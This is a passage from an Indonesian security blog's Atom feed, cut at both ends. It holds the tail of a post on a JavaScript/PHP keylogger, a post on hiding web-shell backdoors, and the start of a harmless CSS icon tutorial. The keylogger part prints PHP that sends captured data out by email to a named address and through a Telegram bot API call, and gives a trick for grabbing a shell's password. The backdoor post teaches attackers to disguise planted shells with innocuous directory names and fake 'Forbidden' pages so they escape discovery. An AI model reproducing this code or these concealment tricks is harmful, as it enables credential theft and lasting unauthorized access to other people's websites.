sans-serif;&quot;&gt;@mail(&quot;indonesianpeople.shutdown57@gmail.com&quot;,$sb,$msg,$headers);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;@file_get_contents(&#39;https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;$fp = fopen(&#39;sl/JavCode-&#39;.date(&#39;dmY&#39;).&#39;.txt&#39;,&#39;a&#39;);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;fwrite($fp,$msg);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;fclose($fp);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;}&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;}else{&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;exit(&#39;?&#39;);&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;}&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Yaps itu merupakan isi dari file _.php didalam script keylogger diatas memakai 3 fungsi logger yang akan dikirimkan ke :&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kedalam Server&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kedalam Email @mail()&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kedalam Telegram dengan menggunakan Api Telegram message&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Jadi keylogger disini mengmbil dari referrer shell yg berada di&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #38761d; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;http:/x.linuxcode.org/_.php&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;terus bagaimana jika shell menggunakan Password ?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Kalian bisa pasang :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #38761d; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;echo &quot;&amp;lt;meta http-equiv=refresh content=0;url=?login=&quot;.$this-&amp;gt;password.&quot;&amp;gt;&quot;;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;untuk ambil variabel password nya&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Untuk Cara pemasangan Keylogger Kalian Bisa Baca disini :&lt;br /&gt;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/07/tutorial-memasang-keylogger-di.html&quot;&gt;Cara Memasang Kylogger di Java Script&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Oke mungkin cukup sekian dan terimakasih semoga bermanfaat&lt;br /&gt;&lt;br /&gt;Selamat Beraktifitas kembali&lt;br /&gt;&lt;br /&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/2604714755092487689/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/malware-attack-using-javascript.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2604714755092487689'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2604714755092487689'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/malware-attack-using-javascript.html' title='JavaScript Keylogger'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/--9euig-MuWY/W1QrndegqmI/AAAAAAAAAIg/G8BlnnqSOi4AemPpRSbdTaj3E9H4UE13wCEwYBhgL/s72-c/javascript.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-7224781702898547353</id><published>2018-07-15T05:28:00.000-07:00</published><updated>2018-07-22T14:59:16.967-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Trik Agar Shell Backdoor Tidak Diketahui Orang bahkan [Google Dorking]</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-7MN9ZgQMvY4/W0s6HgFOVeI/AAAAAAAAAMM/GZ43FjX62bgnQ56s-XVvv0CUFuJQA0iQwCLcBGAs/s1600/Backdoor.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;415&quot; data-original-width=&quot;791&quot; height=&quot;334&quot; src=&quot;https://2.bp.blogspot.com/-7MN9ZgQMvY4/W0s6HgFOVeI/AAAAAAAAAMM/GZ43FjX62bgnQ56s-XVvv0CUFuJQA0iQwCLcBGAs/s640/Backdoor.jpg&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke gengs ketemu lagi sama saya Zaenal yang gans tiada tara , kali ini saya akan share trik agar shell backdoor kalian tidak terkena dorking orang&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke jadi gini ,Jadi kesimpulan nya sangat simple ..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Pada dasarnya ketika orang dorking shell menggunakan google dork yang cukup relevan&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Ex : &lt;b&gt;inurl:/wp-content/plugins/name/shell.php&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;yaps &lt;b&gt;/shell.php&lt;/b&gt; ini yang sangat fatal karena di web ada meta tag , otomatis shell/seluruh file yg sudah masuk di web akan terindex di google&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;otomatis masuk cache google&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Example :&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-ibgHcJwsq08/W0s7LpMY9YI/AAAAAAAAAMY/97yqMXW-jgcxJalDY-XgO1KeqHTu5EVhgCLcBGAs/s1600/Shell.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;540&quot; data-original-width=&quot;869&quot; height=&quot;395&quot; src=&quot;https://1.bp.blogspot.com/-ibgHcJwsq08/W0s7LpMY9YI/AAAAAAAAAMY/97yqMXW-jgcxJalDY-XgO1KeqHTu5EVhgCLcBGAs/s640/Shell.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;jadi ketika kita membuat shell di dir yg kita buat&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Ex : &lt;b&gt;/Haxor&lt;/b&gt;&amp;nbsp;dan upload file &lt;b&gt;index.php&lt;/b&gt;&amp;nbsp;&amp;lt;&amp;lt; index.php berisikan source code shell kalian&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;jadi ketika kita buka dir nya bisa tanpa extentsi .php karena&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kemungkinan besar tidak akan diketahui orang lain walaupun terindex google karena kebanyakan jika nama shell kalian aneh&quot; itu jadi pertimbangan para pencuri shell mungkin mereka fikir itu peluang besar untuk mencuri&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan jangan kalian membuat nama dir yg identik dengan Hacker / Sejenisnya kalian bisa membuat dir dengan nama default dir cms , plugins atau&amp;nbsp;&amp;nbsp;sejenisnya&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Ex : &lt;b&gt;/javascript - /css - /filemanager - /tinymce&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan jika orang lain membuka dir &lt;b&gt;/javascript&lt;/b&gt; otomatis mereka berfikir bahwa ini bukan merupakan sebuah shell&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan hal paling penting set shell background dengan menu tampilan forbidden&amp;nbsp;biar lebih meyakinkan karena bisa jadi mereka mengira bahwa dir tersebut di setting forbidden oleh admin dari web tersebut&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;mungkin trik shell forbidden sudah diketahui tetapi para anak&quot; gblk cukup pintar dan melihat file name nya tidak langsung di close&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;dan nama shell ini juga yg menjadi perhatian karena si anak&quot; gblk pinter mana mungkin admin membuat nama file yg aneh contoh :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Ex : /wp-content/plugins&lt;b&gt;/sayang.php&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt; &lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Nah mungkin begitu lah teknik nya&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan jangan lupa&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Jangan pernah kalian menggunakan &lt;b&gt;&amp;lt;title&amp;gt;Shell bekdor apalah&amp;lt;/title&amp;gt;&lt;/b&gt; cukup gunakan title Forbidden biar orang lain yakin , dikarenakan jika title shell kalian&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Ex : &lt;b&gt;&amp;lt;title&amp;gt;Mini Shell&amp;lt;/title&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Otomatis Anak&quot; kntl lebih mudah untuk mencari karena ketika mereka membaca nama shell sudah pasti niat gblk nya dan mencoba untuk menuju link yg muncul dan efek yg terjadi shell kalian akan hilang begitu saja&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Berikut Sebuah contoh shell yg terkena dorking dan pasti di klik oleh orang lain&amp;nbsp; :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-WirwmzV0SxQ/W0s8nk5e77I/AAAAAAAAAMk/0BOlCk3Een0RUvDeHRqHMfHtOJ_oI1DjQCLcBGAs/s1600/Shell%2BBackdoor.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;661&quot; data-original-width=&quot;1189&quot; height=&quot;354&quot; src=&quot;https://1.bp.blogspot.com/-WirwmzV0SxQ/W0s8nk5e77I/AAAAAAAAAMk/0BOlCk3Een0RUvDeHRqHMfHtOJ_oI1DjQCLcBGAs/s640/Shell%2BBackdoor.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Semoga bermanfaat&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/7224781702898547353/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/trik-agar-shell-backdoor-tidak.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/7224781702898547353'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/7224781702898547353'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/trik-agar-shell-backdoor-tidak.html' title='Trik Agar Shell Backdoor Tidak Diketahui Orang bahkan [Google Dorking]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-7MN9ZgQMvY4/W0s6HgFOVeI/AAAAAAAAAMM/GZ43FjX62bgnQ56s-XVvv0CUFuJQA0iQwCLcBGAs/s72-c/Backdoor.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-1313718028046828588</id><published>2018-07-12T06:50:00.002-07:00</published><updated>2018-07-22T15:03:25.958-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Blogging"/><category scheme="http://www.blogger.com/atom/ns#" term="CSS"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Cara Membuat Icon Menu Navigasi di Blogger</title><content type='html'>&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke kembali lagi bersama saya kali ini saya akan memberi tutorial cara membuat icon menu di Navigasi Blog.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Apa sih untung nya memakai Icon Menu ?&lt;br /&gt;Yups selain mempercantik tampilan halaman blog anda , tentu saja mungkin menjadi daya tari tersendiri, dan kepuasan tersendiri&lt;br /&gt;&lt;br /&gt;Oke langsung saja masuk tahap pertama&lt;br /&gt;&lt;br /&gt;Bahan yang harus disediakan :&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;CSS&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kopi Hangat&amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Dan tentu saja koneksi Internet&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke kalian bisa mengambil CSS nya disini : &lt;br /&gt;&lt;br /&gt;CSS 1 :&amp;nbsp;&lt;a href=&quot;https://www.w3schools.com/w3css/4/w3.css&quot;&gt;Here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;CSS 2 : &lt;a href=&quot;https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css&quot;&gt;Here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke jika sudah kalian bisa masuk ke Dashboard blog kalian, dan masuk kedalam menu &lt;b&gt;Theme &amp;gt; Edite HTML&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; 